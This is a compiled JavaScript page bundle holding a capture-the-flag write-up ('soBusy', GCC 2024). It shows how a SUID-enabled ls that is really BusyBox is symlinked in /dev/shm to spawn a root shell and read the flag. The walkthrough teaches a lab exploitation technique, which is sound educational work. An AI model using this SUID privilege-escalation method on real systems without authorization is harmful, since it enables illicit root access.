1import{_ as s,c as n,o as a,a as e}from"./app-BaeHwvN7.js";const t={},i=e(`<h1 id="ð -sobusy" tabindex="-1"><a class="header-anchor" href="#ð -sobusy"><span>ð soBusy</span></a></h1><div class="custom-container tip"><p class="custom-container-title">ð Before you start</p><p>You can donate to me via <a href="https://buymeacoffee.com/mistrale" target="_blank" rel="noopener noreferrer">Buy Me a Coffee</a> or follow me on <a href="https://github.com/MisTraleuh" target="_blank" rel="noopener noreferrer">Github</a></p></div><h2 id="ð©-getting-the-flag" tabindex="-1"><a class="header-anchor" href="#ð©-getting-the-flag"><span>ð© Getting the Flag</span></a></h2><p>We find ourselves on a VM, aware that we are in a Docker because there is a <code>.dockerenv</code> file at the root of the system.</p><p>As with any good VM we land on, we perform basic commands to understand what we can do.</p><p>Normally, we run a <code>linpeas.sh</code> to get a full report of the machine. However, we do not have write permission in the <code>/tmp/</code> directory, and we cannot execute files we have created.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ <span class="token function">find</span> / <span class="token parameter variable">-perm</span> /4000 <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null</span> 2<span class="line">/usr/bin/sudo</span> 3<span class="line">/usr/bin/pkexec</span> 4<span class="line">/usr/bin/newuidmap</span> 5<span class="line">/usr/bin/gpasswd</span> 6<span class="line">/usr/bin/chsh</span> 7<span class="line">/usr/bin/chfn</span> 8<span class="line">/usr/bin/ls</span> 9<span class="line">/usr/bin/passwd</span> 10<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>It's quite odd to see that we have <code>/usr/bin/ls</code> with SUID. So, we try to execute it to see if we can do something with it.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ /usr/bin/ls <span class="token parameter variable">-la</span> /root</span> 11<span class="line">total <span class="token number">12</span></span> 12<span class="line">drwx------ <span class="token number">2</span> root root <span class="token number">4096</span> Jan <span class="token number">22</span> <span class="token number">12</span>:51 <span class="token builtin class-name">.</span></span> 13<span class="line">drwxr-xr-x <span class="token number">19</span> root root <span class="token number">4096</span> Jan <span class="token number">22</span> <span class="token number">12</span>:51 <span class="token punctuation">..</span></span> 14<span class="line">-rw-r--r-- <span class="token number">1</span> root root <span class="token number">33</span> Jan <span class="token number">10</span> <span class="token number">2024</span> flag.txt</span> 15<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>Indeed, our ls has SUID, so we can execute commands as root but only with our ls.</p><p>However, ls does not allow us to read files or execute them...</p><p>After some thought, I decide to perform an ls on the file <code>/usr/bin/ls</code> to see if I have a genuine ls binary or a malicious one.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ /usr/bin/ls <span class="token parameter variable">-la</span> /usr/bin/ls</span> 16<span class="line">-rwsr-xr-x <span class="token number">1</span> root root <span class="token number">188584</span> Jan <span class="token number">10</span> <span class="token number">2024</span> /usr/bin/ls</span> 17<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div></div></div><p>As I suspected, we should not trust our first impression; we have an <code>ls</code> binary that is SUID. But it'
17s not a <code>real</code> ls because a genuine <code>ls</code> binary should have this size:</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">MisTraleuh@/$ <span class="token function">ls</span> <span class="token parameter variable">-la</span> /bin/ls</span> 18<span class="line">-rwsr-sr-x <span class="token number">1</span> root root <span class="token number">138216</span> Jan <span class="token number">8</span> <span class="token number">15</span>:56 /usr/bin/ls</span> 19<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div></div></div><p>By executing a help argument with <code>ls</code>, we encounter a surprising result:\`</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ /usr/bin/ls <span class="token parameter variable">--help</span></span> 20<span class="line">Usage: <span class="token function">ls</span> <span class="token punctuation">[</span>OPTION<span class="token punctuation">]</span><span class="token punctuation">..</span>. <span class="token punctuation">[</span>FILE<span class="token punctuation">]</span><span class="token punctuation">..</span>.</span> 21<span class="line">Usage: busybox <span class="token punctuation">[</span>function <span class="token punctuation">[</span>arguments<span class="token punctuation">]</span><span class="token punctuation">..</span>.<span class="token punctuation">]</span> </span> 22<span class="line"> or: busybox <span class="token parameter variable">--list</span></span> 23<span class="line"> <span class="token function">link</span> to busybox <span class="token keyword">for</span> each <span class="token keyword">function</span> they wish to use and BusyBox</span> 24<span class="line"><span class="token punctuation">[</span><span class="token punctuation">..</span>.<span class="token punctuation">]</span></span> 25<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>Thus, we have an <code>ls</code> binary that is also a <code>busybox</code> binary. Therefore, we can execute commands with this <code>ls</code> binary, which is in reality a busybox binary.</p><p>As mentioned earlier, even if the <code>/tmp/</code> directory is not writable, the <code>/dev/shm</code> directory is. So, we can execute commands in this directory.</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh" data-title="sh"><pre><code><span class="line">gcc2024@soBusy:~$ <span class="token builtin class-name">cd</span> /dev/shm</span> 26<span class="line">gcc2024@sobusy:/dev/shm$ <span class="token function">ln</span> <span class="token parameter variable">-s</span> /usr/bin/ls busybox</span> 27<span class="line">gcc2024@sobusy:/dev/shm$ ./busybox /bin/sh</span> 28<span class="line">root<span class="token comment"># id</span></span> 29<span class="line"><span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span></span> 30<span class="line">root<span class="token comment"># cat /root/flag.txt</span></span> 31<span class="line">GCC<span class="token punctuation">{</span>BusyBox_H4s_M0r3_Opti0ns_Th4n_LS<span class="token punctuation">}</span></span> 32<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div>`,20),l=[i];function o(p,c){return a(),n("div",null,l)}const u=s(t,[["render",o],["__file","index.html.vue"]]),d=JSON.parse('{"path":"/en/Gcc-2024/SoBusy/","title":"ð soBusy","lang":"en-US","frontmatter":{},"headers":[{"level":2,"title":"ð© Getting the Flag","slug":"ð©-getting-the-flag","link":"#ð©-getting-the-flag","children":[]}
32],"git":{},"filePathRelative":"en/Gcc-2024/SoBusy/README.md"}');export{u as comp,d as data};
Line numbers count LF bytes from the start of the resource, as the search results do. Vendor segments are library code the classifier recognised; they are stored but not indexed. Bytes are shown as Latin1 characters, one per byte.